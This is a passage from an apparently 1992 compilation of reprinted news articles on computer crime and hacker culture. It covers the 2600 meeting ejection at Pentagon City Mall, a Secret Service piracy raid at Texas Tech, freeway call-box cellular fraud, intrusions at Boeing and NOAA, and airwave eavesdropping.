  4213. the names of the guards, they took his pencil and paper."
  4214.  
  4215. Neidorf continued, "I left to go outside and rejoined the group when they were
  4216. ejected from the mall.  The guards continued challenging the group and told
  4217. them that they would be arrested if they returned.  When one of the people
  4218. began to take pictures of the guards, the apparent supervisor became excited
  4219. and threatening but did not confiscate the film."
  4220.  
  4221. Neidorf also said, "I think that the raid was planned.  They hit right about
  4222. 6:00 and they identified our group as "hackers" and said that they knew that
  4223. this group met every month."
  4224.  
  4225. Neidorf's story was supported by a Washington "hacker" called "Inhuman," who
  4226. told Newsbytes, "I arrived at the meeting late and saw the group being detained
  4227. by the guards.  I walked along with the group as they were being ushered out
  4228. and when I asked a person who seemed to be in authority his name, he pointed at
  4229. a badge with his name written in script on it.  I couldn't make out the name
  4230. and, when I mentioned that to the person, he said 'If you can't read it, too
  4231. bad.'  I did read his name, 'C. Thomas,' from another badge."
  4232.  
  4233. Inhuman also told Newsbytes that he was told by a number of people that the
  4234. guards said that they were "acting on behalf of the Secret Service."  He added,
  4235. "I was also told that there were two police officers from the Arlington County
  4236. Police present but I did not see them."
  4237.  
  4238. Another attendee, Doug Luce, reports, "I also got to the DC meeting very late;
  4239. 7:45 or so.  It seemed like a coordinated harassment episode, not geared toward
  4240. busting anyone, but designed to get people riled up, and maybe not come back to
  4241. the mall."
  4242.  
  4243. Luce adds that he overheard a conversation between someone who had brought a
  4244. keyboard to sell.  The person, he said, was harassed by security forces, one of
  4245. whom said, "You aren't selling anything in my mall without a vendors permit!"
  4246.  
  4247. Possible Secret Service involvement was supported by a 19 year-old college
  4248. student known as the "Lithium Bandit," who told Newsbytes, "I got to the mall
  4249. about 6:15 and saw the group being detained by approximately 5 Arlington County
  4250. police and 5 security guards. When I walked over to see what was going on, a
  4251. security guard asked me for an ID and I refused to show it, saying that I was
  4252. about to leave.  The guard said that I couldn't leave and told me that I had to
  4253. see a police officer.  When I did, the officer demanded ID and, when I once
  4254. again refused, he informed me that I could be detained for up to 10 hours for
  4255. refusing to produce identification.  I gave in and produced my school ID which
  4256. the police gave to the security people who copied down my name and social
  4257. security number."
  4258.  
  4259. Lithium Bandit continued, "When I asked the police what was behind this action,
  4260. I was told that they couldn't answer but that 'the Secret Service is involved
  4261. and we are within our rights doing this."
  4262.  
  4263. The boy says he and others later went to the Arlington police station to get
  4264. more information and were told only that there was a report of the use of a
  4265. stolen credit card and two officers were sent to investigate.  "They later
  4266. admitted that it was 5 (officers).  While I was detained, I heard no mention of
  4267. a credit card and there was no one arrested."
  4268. Marc Rotenberg, director of CPSR's Washington office, told Newsbytes, "I have
  4269. really no details on the incident yet, but I am very concerned about the
  4270. reports. Confiscation of CPSR applications, if true, is outrageous.  I will
  4271. find out more facts on Monday."
  4272.  
  4273. Newsbytes was told by the Pentagon City Mall office that any information
  4274. concerning the action would have to come from the director of security, Al
  4275. Johnson, who was not available until Monday.  The Arlington Country Police
  4276. referred Newsbytes to a "press briefing recording" which had not been updated
  4277. since the morning before the incident.
  4278.  
  4279. Corley told Newsbytes, "There have been no reports of misbehavior by any of
  4280. these people.  They were obviously singled out because they were hackers.  It's
  4281. as if they were being singled out as an ethnic group.  I admire the way the
  4282. group responded -- in a courteous fashion.  But it is inexcusable that it
  4283. happened.  I will be at the next Washington meeting to insure that it doesn't
  4284. happen again."
  4285.  
  4286. The manager of one of New York state's largest malls provided background
  4287. information to Newsbytes on the rights of malls to police those on mall
  4288. property, saying, "The primary purpose of a mall is to sell. The interior of
  4289. the mall is private property and is subject to the regulations of the mall. 
  4290. The only requirement is that the regulations be enforced in an even-handed
  4291. manner.  I do not allow political activities in my mall so I could not make an
  4292. exception for Democrats.  We do allow community groups to meet but they must
  4293. request space at least two weeks before the meeting and must have proper
  4294. insurance.  Our regulations also say that groups of more than 4 may not
  4295. congregate in the mall."
  4296.  
  4297. The spokeswoman added that mall security can ask for identification from those
  4298. who violate regulations and that they may be barred from the mall for a period
  4299. of 6 months.
  4300.  
  4301. She added, "Some people feel that mall atriums and food courts are public
  4302. space.  They are not and the industry is united on this.  If the malls were to
  4303. receive tax benefits for the common space and public service in snow removal
  4304. and the like, it could possibly be a public area but malls are taxed on the
  4305. entire space and are totally private property, subject to their own
  4306. regulations.  If a group of 20 or more congregated in my mall, they would be
  4307. asked to leave."
  4308.  
  4309. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4310.  
  4311.  Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
  4312.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4313.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4314.  
  4315. WASHINGTON, D.C.-- In the aftermath of an action on Friday, November 6th by
  4316. members of the Pentagon City Mall Police and police from Arlington County,
  4317. Virginia in which those attending a 2600 meeting at the mall were ordered from
  4318. the premises, conflicting stories continue to appear.
  4319.  
  4320. Attendees at the meeting have contended to Newsbytes that members of the mall
  4321. police told them that they were "acting on behalf of the Secret Service."  They
  4322. also maintain that the mall police confiscated material from knapsacks and took
  4323. film from someone attempting to photograph the action and a list of the names
  4324. of security officers that one attendee was attempting to compile.
  4325.  
  4326. Al Johnson, chief of security for the mall, denied these allegations to
  4327. Newsbytes, saying "No one said that we were acting on behalf of the Secret
  4328. Service.  We were merely enforcing our regulations.  While the group was not
  4329. disruptive, it had pulled tables together and was having a meeting in our food
  4330. court area.  The food court is for people eating and is not for meetings.  We
  4331. therefore asked the people to leave."
  4332.  
  4333. Johnson denied that security personnel took away any film or lists and further
  4334. said "We did not confiscate any material.  The group refused to own up to who
  4335. owned material on the tables and in the vicinity so we collected it as lost
  4336. material.  If it turns out that anything did belong to any of those people,
  4337. they are welcome to come in and, after making proper identification, take the
  4338. material."
  4339.  
  4340. In a conversation early on November 9th, Robert Rasor, Secret Service agent-in-
  4341. charge of computer crime investigations, told Newsbytes that having mall
  4342. security forces represent the Secret Service is not something that was done
  4343. and, that to his knowledge, the Secret Service had no involvement with any
  4344. Pentagon City mall actions on the previous Friday.
  4345.  
  4346. A Newsbytes call to the Arlington County police was returned by a Detective
  4347. Nuneville who said that her instructions were to refer all questions concerning
  4348. the matter to agent David Adams of the Secret Service.  She told Newsbytes that
  4349. Adams would be providing all information concerning the involvement of both the
  4350. Arlington Police and the Secret Service in the incident.
  4351.  
  4352. Adams told Newsbytes "The mall police were not acting as agents for the Secret
  4353. Service. Beyond that, I can not confirm or deny that there is an ongoing
  4354. investigation."
  4355.  
  4356. Adams also told Newsbytes that "While I cannot speak for the Arlington police,
  4357. I understand that their involvement was due to an incident unrelated to the
  4358. investigation."
  4359.  
  4360. Marc Rotenberg, director of the Washington office of Computer Professionals for
  4361. Social Responsibility (CPSR), told Newsbytes "CPSR has reason to believe that
  4362. the detention of people at the Pentagon City Mall last Friday was undertaken at
  4363. the behest of the Secret Service, which is a federal agency.  If that is the
  4364. case, then there was an illegal search of people at the mall.  There was no
  4365. warrant and no indication of probable illegal activity.  This raises
  4366. constitutional issues. We have undertaken the filing of a Freedom of
  4367. Information Act (FOIA) request to determine the scope, involvement and purpose
  4368. of the Secret Service in this action."
  4369.  
  4370. 2600 meetings are held on the evening of the first Friday of each month in
  4371. public places and malls in New York City, Washington, Philadelphia, Cambridge,
  4372. St. Louis, Chicago, Los Angeles and San Francisco.  They are promoted by 2600
  4373. Magazine: The Hacker Quarterly and are attended by a variety of persons
  4374. interested in telecommunications and so-called "hacker issues".  The New York
  4375. meeting, the oldest of its kind, is regularly attended by Eric Corley a/k/a
  4376. Emmanuel Goldstein, editor and publisher of 2600, hackers, journalists,
  4377. corporate communications professionals and other interested parties.  It is
  4378. known to have been the subject of surveillance at various times by law
  4379. enforcement agencies conducting investigations into allegations of computer
  4380. crime.
  4381.  
  4382. Corley told Newsbytes "While I'm sure that meetings have been observed by law
  4383. enforcement agencies, this is the only time that we have been harassed.  It's
  4384. definitely a freedom of speech issue." Corley also that he plans to be at the
  4385. December meeting in Washington "to insure that it doesn't happen again."
  4386.  
  4387. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4388.  
  4389.  Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
  4390.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4391.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4392.  
  4393. WASHINGTON, D.C. -- In the on-going investigation of possible Secret Service
  4394. involvement in the Friday, November 6th ejection of attendees at a "2600
  4395. meeting" from the premises of the Pentagon City Mall, diametrically opposed
  4396. statements have come from the same source.
  4397.  
  4398. Al Johnson, chief of security for the Pentagon City Mall told Newsbytes on
  4399. Monday, November 9th "No one said that we were acting on behalf of the Secret
  4400. Service.  We were merely enforcing our regulations.  While the group was not
  4401. disruptive, it had pulled tables together and was having a meeting in our food
  4402. court area.  The food court is for people eating and is not for meetings.  We
  4403. therefore asked the people to leave."
  4404.  
  4405. On the same day, Johnson was quoted was quoted in a Communications Daily
  4406. article by Brock Meeks as saying "As far as I'm concerned, we're out of this. 
  4407. The Secret Service, the FBI, they're the ones that ramrodded this whole thing."
  4408.  
  4409. Newsbytes contacted Meeks to discuss the discrepancies in the stories and were
  4410. informed that the conversation with Johnson had been taped and was available
  4411. for review.  The Newsbytes reporter listened to the tape (and reviewed a
  4412. transcript).  On the tape, Johnson was clearly heard to make the statement
  4413. quoted by Meeks.
  4414.  
  4415. He also said "maybe you outta call the Secret Service, they're handling this
  4416. whole thing.  We, we were just here", and, in response to a Meeks question
  4417. about a Secret Service contact, "Ah.. you know, I don't have a contact person. 
  4418. These people were working on their own, undercover, we never got any names, but
  4419. they definitely, we saw identification, they were here."
  4420.  
  4421. Newsbytes contacted Johnson again on the morning of Wednesday, November 11 and
  4422. asked him once again whether there was any Secret Service involvement in the
  4423. action. Johnson said "No, I told you that they were not involved."  When it was
  4424. mentioned that there was a story in Communications Daily, quoting him to the 
  4425. contrary, Johnson said "I never told Meeks that.  There was no Secret Service
  4426. involvement"
  4427.  
  4428. Informed of the possible existence of a tape quoting him to the contrary.
  4429. Johnson said "Meeks taped me? He can't do that.  I'll show him that I'm not
  4430. fooling around.  I'll have him arrested."
  4431.  
  4432. Johnson also said "He asked me if the Secret Service was involved; I just told
  4433. him that, if he thought they were, he should call them and ask them."
  4434.  
  4435. Then Johnson again told Newsbytes that the incident was "just a mall problem.
  4436. There were too many people congregating."
  4437.  
  4438. [NOTE: Newsbytes stands by its accurate reporting of Johnson's statements.  It
  4439. also affirms that the story by Meeks accurately reflects the material taped
  4440. during his interview]
  4441.  
  4442. In a related matter, Marc Rotenberg, director of the Washington office of
  4443. Computer Professionals For Social Responsibility (CPSR) has announced that CPSR
  4444. has filed a Freedom of Information Act (FOIA) request with the Secret Service
  4445. asking for information concerning Secret Service involvement in the incident.
  4446.  
  4447. Rotenberg told Newsbytes that the Secret Service has 10 days to respond to the
  4448. request.  He also said that CPSR "is exploring other legal options in this
  4449. matter."
  4450.  
  4451. The Secret Service, in earlier conversations with Newsbytes, has denied that
  4452. the mall security was working on its behalf.
  4453.  
  4454. In the incident itself, a group attending the informal meeting was disbanded
  4455. and, according to attendees, had property confiscated.  They also contend that
  4456. security guards took film from someone photographing the confiscation as well
  4457. as a list that someone was making of the guard's names.  In his November 9th
  4458. conversation with Newsbytes, Johnson denied that security personnel took away
  4459. any film or lists and further said "We did not confiscate any material.  The
  4460. group refused to own up to who owned material on the tables and in the vicinity
  4461. so we collected it as lost material.  If it turns out that anything did belong
  4462. to any of those people, they are welcome to come in and, after making proper
  4463. identification, take the material."
  4464.  
  4465. 2600 meetings are promoted by 2600 Magazine: The Hacker Quarterly and are held
  4466. on the evening of the first Friday of each month in public places and malls in
  4467. New York City, Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los
  4468. Angeles and San Francisco.  They are regularly attended by a variety of persons
  4469. interested in telecommunications and so-called "hacker issues".
  4470. _______________________________________________________________________________
  4471.  
  4472.  Secret Service Grabs Computers In College Raid               December 17, 1992
  4473.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4474.  by Joe Abernathy (The Houston Chronicle)(Page A37)
  4475.  
  4476. The Secret Service has raided a dorm room at Texas Tech University, seizing the
  4477. computers of two Houston-area students who allegedly used an international
  4478. computer network to steal computer software.
  4479.  
  4480. Agents refused to release the names of the two area men and a third man, a
  4481. former Tech student from Austin, who were not arrested in the late-morning raid
  4482. Monday at the university in Lubbock.  Their cases will be presented to a grand
  4483. jury in January.
  4484.  
  4485. The three, in their early 20s, are expected to be charged with computer crime,
  4486. interstate transport of stolen property and copyright infringements.
  4487.  
  4488. "The university detected it," said Agent R. David Freriks of the Secret Service
  4489. office in Dallas, which handled the case.  He said Texas Tech computer system
  4490. operators noticed personal credit information mixed in with the software
  4491. mysteriously filling up their data storage devices.
  4492.  
  4493. The former student admitted pirating at least $6,000 worth of games and
  4494. programs this summer, Freriks said.
  4495.  
  4496. The raid is the first to fall under a much broader felony definition of
  4497. computer software piracy that could affect many Americans.
  4498.  
  4499. Agents allege the three used the Internet computer network, which connects up
  4500. to 15 million people in more than 40 nations, to make contacts with whom they
  4501. could trade pirated software.  The software was transferred over the network,
  4502. into Texas Tech's computers and eventually into their personal computers.
  4503.  
  4504. The Software Publishers Association, a software industry group chartered to
  4505. fight piracy, contends the industry lost $1.2 billion in sales in 1991 to
  4506. pirates.
  4507.  
  4508. Although these figures are widely questioned for their accuracy, piracy is
  4509. widespread among Houston's 450-plus computer bulletin boards, and even more so
  4510. on the global Internet.
  4511.  
  4512. "There are a lot of underground sites on the Internet run by university system
  4513. administrators, and they have tons of pirated software available to download --
  4514. gigabytes of software," said Scott Chasin, a former computer hacker who is now
  4515. a computer security consultant.
  4516.  
  4517. Freriks said the investigation falls under a revision of the copyright laws
  4518. that allows felony charges to be brought against anyone who trades more than 10
  4519. pieces of copyrighted software -- a threshold that would cover many millions of
  4520. Americans who may trade copies of computer programs with their friends.
  4521.  
  4522. "The ink is barely dry on the amendment, and you've already got law enforcement
  4523. in there, guns blazing, because somebody's got a dozen copies of stolen
  4524. software," said Marc Rotenberg, director of Computer Professionals for Social
  4525. Responsibility, in Washington.
  4526.  
  4527. "That was a bad provision when it was passed, and was considered bad for
  4528. precisely this reason, giving a justification for over-reaching by law
  4529. enforcement."
  4530.  
  4531. Freriks said the raid also involved one of the first uses of an expanded right
  4532. to confiscate  computers  used in crime.
  4533.  
  4534. "Our biggest complaint has been that you catch 'em and slap 'em on the wrist,
  4535. and then give the smoking gun back," he said.
  4536.  
  4537. "So they've changed the law so that we now have forfeiture authority."
  4538.  
  4539. The Secret Service already has been under fire for what is seen by civil
  4540. libertarians as an overly casual use of such authority, which many believe has
  4541. mutated from an investigative tool into a de facto punishment without adequate
  4542. court supervision.
  4543.  
  4544. _______________________________________________________________________________
  4545.  
  4546.  Hacker Taps Into Freeway Call Box -- 11,733 Times             October 23, 1992
  4547.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4548.  by Jeffrey A. Perlman (Los Angeles Times)(Page A3)
  4549.  
  4550. SANTA ANA, CA -- An enterprising hacker reached out and touched someone 11,733
  4551. times in August -- from a freeway emergency call box in Orange County.
  4552.  
  4553. A computer that monitors the county's emergency call boxes attributed 25,875
  4554. minutes of calls to the mysterious caller who telephoned people in countries
  4555. across the globe, according to a staff report prepared for the Orange County
  4556. Transportation Authority.
  4557.  
  4558. "This is well over the average of roughly 10 calls per call box," the report
  4559. noted.
  4560.  
  4561. About 1,150 bright yellow call boxes have been placed along Orange County's
  4562. freeways to connect stranded motorists to the California Highway Patrol.  But
  4563. the caller charged all his calls to a single box on the shoulder of the Orange
  4564. (57) Freeway.
  4565.  
  4566. The hacker apparently matched the individual electronic serial number for the
  4567. call box to its telephone number.  It took an investigation by the transit
  4568. authority, and three cellular communications firms to unravel the mystery, the
  4569. report stated.
  4570.  
  4571. Officials with the transit authority's emergency call box program were not
  4572. available to comment on the cost of the phone calls or to say how they would be
  4573. paid.
  4574.  
  4575. But the report assured that "action has been taken to correct this problem.  It
  4576. should be noted that this is the first incident of this type in the five-year
  4577. history of the program."
  4578.  
  4579. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4580.  
  4581.  Ring May Be Responsible For Freeway Call Box Scam             October 24, 1992
  4582.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4583.  by Jodi Wilgoren (Los Angeles Times)(Page B4)
  4584.  
  4585.             "Officials Believe A Hacker Sold Information to Others;
  4586.                   LA Cellular Will Pay For The Excess Calls."
  4587.  
  4588. COSTA MESA, CA -- As soon as he saw the August bill for Orange County's freeway
  4589. call boxes, analyst Dana McClure guessed something was awry.
  4590.  
  4591. There are typically about 12,000 calls a month from the 1,150 yellow boxes that
  4592. dot the county's freeways.  But in August, there were nearly that many
  4593. registered to a single box on the Orange Freeway a half-mile north of Lambert
  4594. Road in Brea.
  4595.  
  4596. "This one stood out, like 'Whoa!'" said McClure, who analyzes the monthly
  4597. computer billing tapes for the Orange County Transportation Authority.  "It
  4598. kicked out as an error because the number of minutes was so far over what it is
  4599. supposed to be."
  4600.  
  4601. With help from experts at LA Cellular, which provides the telephone service for
  4602. the boxes, and GTE Cellular, which maintains the phones, McClure and OCTA
  4603. officials determined that the calls -- 11,733 of them totaling 25,875 minutes
  4604. for a charge of about $1,600 -- were made because the hacker learned the code
  4605. and telephone number for the call boxes.
  4606.  
  4607. Because of the number of calls in just one month's time, officials believe
  4608. there are many culprits, perhaps a ring of people who bought the numbers from
  4609. the person who cracked the system.
  4610.  
  4611. You'd have to talk day and night for 17 or 18 days to do that; it'd be
  4612. fantastic to be able to make that many calls," said Lee Johnson of GTE
  4613. Cellular.
  4614.  
  4615. As with all cases in which customers prove they did not make the calls on their
  4616. bills, LA Cellular will pick up the tab, company spokeswoman Gail Pomerantz
  4617. said.  Despite the amount of time involved, the bill was only $1,600, according
  4618. to OCTA spokeswoman Elaine Beno, because the county gets a special emergency
  4619. service rate for the call box lines.
  4620.  
  4621. The OCTA will not spend time and money investigating who made the calls;
  4622. however, it has adjusted the system to prevent further fraud.  Jim Goode of LA
  4623. Cellular said such abuses are rare among cellular subscribers, and that such
  4624. have never before been tracked to freeway call boxes.
  4625.  
  4626. The call boxes contain solar cellular phones programmed to dial directly to the
  4627. California Highway Patrol or a to a GTE Cellular maintenance line.  The calls
  4628. on the August bill included 800 numbers and 411 information calls and hundreds
  4629. of calls to financial firms in New York, Chicago and Los Angeles.  That calls
  4630. were placed to these outside lines indicates that the intruders made the
  4631. connections from another cellular phone rather than from the call box itself. 
  4632. Each cellular phone is assigned a seven-digit Mobile Identification Number that
  4633. functions like a phone number, and a 10- or 11-digit Electronic Service Number
  4634. unique to that particular phone (similar to the vehicle identification number
  4635. assigned every automobile).  By reprogramming another cellular phone with the
  4636. MIN and ESN of the call box phone, a hacker could charge all sorts of calls to
  4637. the OCTA.
  4638.  
  4639. "That's not legally allowable, and it's not an easy thing to do," McClure said,
  4640. explaining that the numbers are kept secret and that reprogramming a cellular
  4641. phone could wreck it.  "Most people don't know how to do that, but there are
  4642. some."
  4643.  
  4644. Everyone involved with the call box system is confident that the problem has
  4645. been solved, but officials are mum as to how they blocked potential cellular
  4646. banditry.
  4647.  
  4648. "I don't think we can tell you what we did to fix it because we don't want it
  4649. to happen again," Beno said with a laugh.
  4650. _______________________________________________________________________________
  4651.  
  4652.  FBI Probes Possible Boeing Computer Hacker                    November 6, 1992
  4653.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4654.  Taken from Reuters
  4655.  
  4656. SEATTLE -- Federal authorities said Friday they were investigating the
  4657. possibility that a hacker had breached security and invaded a Unix-based
  4658. computer system at the aerospace giant Boeing Co.
  4659.  
  4660. The Federal Bureau of Investigation confirmed the probe after a Seattle radio
  4661. station reported it received a facsimile of a Boeing memorandum warning
  4662. employees the security of one of its computer networks may have been violated.
  4663.  
  4664. The memo, which had been sent from inside Boeing, said passwords may have been
  4665. compromised, a reporter for the KIRO station told Reuters.
  4666.  
  4667. KIRO declined to release a copy of the memorandum or to further identify its
  4668. source.
  4669.  
  4670. The memorandum said the problem involved computers using Unix, the open-ended
  4671. operating system used often in engineering work.
  4672.  
  4673. Sherry Nebel, a spokeswoman at Boeing's corporate headquarters, declined
  4674. comment on the memorandum or the alleged breach of security and referred all
  4675. calls to the FBI.
  4676.  
  4677. An FBI spokesman said the agency was in touch with the company and would
  4678. discuss with it possible breaches of federal law.
  4679.  
  4680. No information was immediately available on what type of computer systems may
  4681. have been violated at Boeing, the world's largest commercial aircraft
  4682. manufacturer.
  4683.  
  4684. The company, in addition, acts as a defense contractor and its business
  4685. includes work on the B-2 stealth bomber, NASA's space station and the "Star
  4686. Wars" project.
  4687.  
  4688. Boeing is a major user of computer technology and runs a computer services
  4689. group valued at $1 billion.
  4690.  
  4691. Much of the company's engineering work is conducted using computer -aided
  4692. design (CAD) capabilities.  Boeing currently is pioneering a computerized
  4693. technique which uses 2,000 computer terminals to design its new 777 twinjet.
  4694.  
  4695. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4696.  
  4697.  FBI Expands Boeing Computer Hacker Probe                      November 9, 1992
  4698.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4699.  by Samuel Perry (Reuters)
  4700.  
  4701. SEATTLE -- Federal authorities expanded their investigation of a computer
  4702. hacker or hackers suspected of having invaded a computer system at aerospace
  4703. giant and defense contractor Boeing Co.
  4704.  
  4705. FBI spokesman Dave Hill said the investigation was expanded after the agency
  4706. discovered similar infiltrations of computer records belonging to the U.S.
  4707. District Court in Seattle and another government agency.
  4708.  
  4709. "We're trying to determine if the same individuals are involved here," he said,
  4710. adding more than one suspect may be involved and the purpose of the intrusion
  4711. was unclear.
  4712.  
  4713. "We don't think this was an espionage case," Hill said, adding federal agents
  4714. were looking into violations of U.S. law barring breaking into a computer of
  4715. federal interest, but that no government classified data was believed to be
  4716. compromised.
  4717.  
  4718. "I'm not sure what their motivation is," he told Reuters.
  4719.  
  4720. The FBI confirmed the investigation after a Seattle radio station reported it
  4721. received a facsimile of a Boeing memorandum warning employees that the security
  4722. of one of its computer networks may have been violated.
  4723.  
  4724. A news reporter at KIRO Radio, which declined to release the facsimile, said
  4725. it was sent by someone within Boeing and that it said many passwords may have
  4726. been compromised.
  4727.  
  4728. Boeing's corporate headquarters has declined to comment on the matter,
  4729. referring all calls to the FBI.
  4730.  
  4731. The huge aerospace company, which is the world's largest maker of commercial
  4732. jetliners, relies heavily on computer processing to design and manufacture its
  4733. products. Its data processing arm operates $1.6 billion of computer equipment.
  4734.  
  4735. No information was disclosed on what system at Boeing had been compromised.
  4736. But one computer industry official said it could include "applications
  4737. involving some competitive situations in the aerospace industry.
  4738.  
  4739. The company is a defense contractor or subcontractor on major U.S. military
  4740. programs, such as the B-2 stealth bomber, the advanced tactical fighter,
  4741. helicopters, the NASA space station and the "Star Wars" missile defense system.
  4742.  
  4743. Recently, Boeing has pioneered the unprecedented use of computer-aided design
  4744. capabilities in engineering its new 777 twinjet. The design of the 777 is now
  4745. mostly complete as Boeing prepares for final assembly beginning next year.
  4746.  
  4747. That system, which uses three-dimensional graphics to replace a draftsman's
  4748. pencil and paper, includes 2,000 terminals that can tap into data from around
  4749. the world.
  4750. _______________________________________________________________________________
  4751.  
  4752.  Hacker Breaches NOAA Net                                        August 3, 1992
  4753.  ~~~~~~~~~~~~~~~~~~~~~~~~
  4754.  by Kevin Power (Government Computer News)(Page 10)
  4755.  
  4756. As a recent breach of the National Oceanic and Atmospheric Administration's
  4757. (NOAA) link to the Internet shows, the network not only benefits scientists but
  4758. also attracts unwanted attention from hackers.
  4759.  
  4760. NOAA officials said an intruder in May accessed the agency's TCP/IP network,
  4761. seeking to obtain access to the Internet.  The breach occurred on the National
  4762. Weather Service headquarters' dial-in communications server in Silver Spring,
  4763. Maryland, said Harold Whitt, a senior telecommunications engineer with NOAA.
  4764.  
  4765. Cygnus Support, a Palo Alto, California, software company, alerted NOAA
  4766. officials to the local area network security breach when Cygnus found that an
  4767. outsider had accessed one of its servers from the NOAA modem pool and had
  4768. attempted several  long-distance phone calls.
  4769.  
  4770. NOAA and Cygnus officials concluded that the perpetrator was searching for an
  4771. Internet host, possibly to locate a games publisher, Whitt said.  Fortunately,
  4772. the hacker did no damage to NOAA's data files, he said.
  4773.  
  4774. Whitt said intruders using a modem pool to tap into external networks are
  4775. always a security concern.  But organizations with Internet access seem to be
  4776. hacker favorites, he said.  "There's a lot of need for Internet security,"
  4777. Whitt said.
  4778.  
  4779. "You have to make sure you monitor the usage of the TCP/IP network and the
  4780. administration of the local host.  It's a common problem, but in our case we're
  4781. more vulnerable because of tremendous Internet access," Whitt said.
  4782.  
  4783. Whitt said NOAA's first response was to terminate all dial-in services
  4784. temporarily and change all the numbers.
  4785.  
  4786. Whitt said he also considered installing a caller-identification device for the
  4787. new lines.  But the phone companies have limited capabilities to investigate
  4788. random incidents, he said.
  4789.  
  4790. "It's very difficult to isolate problems at the protocol level," Whitt said.
  4791. "We targeted the calls geographically to the Midwest.
  4792.  
  4793. "But once you get into the Internet and have an understanding of TCP/IP, you
  4794. can just about go anywhere," Whitt said.
  4795.  
  4796. NOAA, a Commerce Department agency, has since instituted stronger password
  4797. controls and installed a commercial dial-back security system, Defender from
  4798. Digital Pathways Inc. of Mountain View, California.
  4799.  
  4800. Whitt said the new system requires users to undergo password validation at dial
  4801. time and calls back users to synchronize modems and log calls.  Despite these
  4802. corrective measures, Reed Phillips, Commerce's IRM director, said the NOAA
  4803. incident underlies the axiom that networks always should be considered
  4804. insecure.
  4805.  
  4806. At the recent annual conference of the Federation of Government Information
  4807. Processing Councils in New Orleans, Phillips said the government is struggling
  4808. to transmit more information electronically and still maintain control over the
  4809. data.
  4810.  
  4811. Phillips said agencies are plagued by user complacency, a lack of
  4812. organizational control, viruses, LAN failures and increasing demands for
  4813. electronic commerce. "I'm amazed that there are managers who believe their
  4814. electronic-mail systems are secure," Phillps said.  "We provide a great deal of
  4815. security, but it can be interrupted.
  4816.  
  4817. "Security always gets hits hard in the budget.  But the good news is vendors
  4818. recognize our needs and are coming out with cheaper security tools," Phillips
  4819. said.
  4820.  
  4821. Phillips said the NOAA attack shows that agencies must safeguard a network's
  4822. physical points because LANs present more security problems than centralized
  4823. systems.
  4824.  
  4825. "The perpetrator can dial in via a modem using the common services provided by
  4826. the telephone company, and the perpetrator risks no personal physical harm.  By
  4827. gaining access to a single system on the network the perpetrator is then able
  4828. to propagate his access rights to multiple systems on the network," Phillips
  4829. said.
  4830.  
  4831. "In many LAN environments a user need only log on the network once and all
  4832. subsequent access is assumed to be authorized for the entire LAN.  It then
  4833. becomes virtually impossible for a network manager or security manager to track
  4834. events of a perpetrator," he said.
  4835. _______________________________________________________________________________
  4836.  
  4837.  Hackers Scan Airwaves For Conversations                        August 17, 1992
  4838.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4839.  by Mark Lewyn (The Washington Post)(Page A1) 
  4840.  
  4841.                     "Eavesdroppers Tap Into Private Calls."
  4842.  
  4843. On the first day of the Soviet coup against Mikhail Gorbachev in August 1991,
  4844. Vice President Quayle placed a call to Senator John C. Danforth (R-Mo.) and
  4845. assessed the tense, unfolding drama.
  4846.  
  4847. It turned out not to be a private conversation.
  4848.  
  4849. At the time, Quayle was aboard a government jet, flying to Washington from
  4850. California.  As he passed over Amarillo, Texas his conversation, transmitted
  4851. from the plane to Danforth's phone, was picked up by an eavesdropper using
  4852. electronic "scanning" gear that searches the airwaves for radio or wireless
  4853. telephone transmissions and then locks onto them.
  4854.  
  4855. The conversation contained no state secrets -- the vice president observed that
  4856. Gorbachev was all but irrelevant and Boris Yeltsin had become the man to watch. 
  4857. But it remains a prized catch among the many conversations overhead over many
  4858. years by one of a steadily growing fraternity of amateur electronics
  4859. eavesdroppers who listen in on all sorts of over-the-air transmissions, ranging
  4860. from Air Force One communications to cordless car-phone talk.
  4861.  
  4862. One such snoop overheard a March 1990 call placed by Peter Lynch, a well-known
  4863. mutual fund executive in Boston, discussing his forthcoming resignation, an
  4864. event that later startled financial circles.  Another electronic listener
  4865. overheard the chairman of Popeye's Fried Chicken disclose plans for a 1988
  4866. takeover bid for rival Church's Fried Chicken.
  4867.  
  4868. Calls by President Bush and a number of Cabinet officers have been intercepted.
  4869. The recordings of car-phone calls made by Virginia Governor L. Douglas Wilder
  4870. (D), intercepted by a Virginia Beach restaurant owner and shared with Senator
  4871. Charles S. Robb (D-Va.), became a cause ce'le'bre in Virginia politics.
  4872.  
  4873. Any uncoded call that travels via airwaves, rather than wire, can be picked up,
  4874. thus the possibilities have multiplied steadily with the growth of cellular
  4875. phones in cars and cordless phones in homes and offices.  About 41 percent of
  4876. U.S. households have cordless phones and the number is expected to grow by
  4877. nearly 16 million this year, according to the Washington-based Electronics
  4878. Industry Association.
  4879.  
  4880. There are 7.5 million cellular phone subscribers, a technology that passes
  4881. phone calls over the air through a city from one transmission "cell" to the
  4882. next. About 1,500 commercial airliners now have air-to-ground phones -- roughly
  4883. half the U.S. fleet.
  4884.  
  4885. So fast-growing is this new form of electronic hacking that it has its own
  4886. magazines, such as Monitoring Times.  "The bulk of the people doing this aren't
  4887. doing it maliciously," said the magazine's editor, Robert Grove, who said he
  4888. has been questioned several times by federal agents, curious about hackers'
  4889. monitoring activities.
  4890.  
  4891. But some experts fear the potential for mischief.  The threat to business from
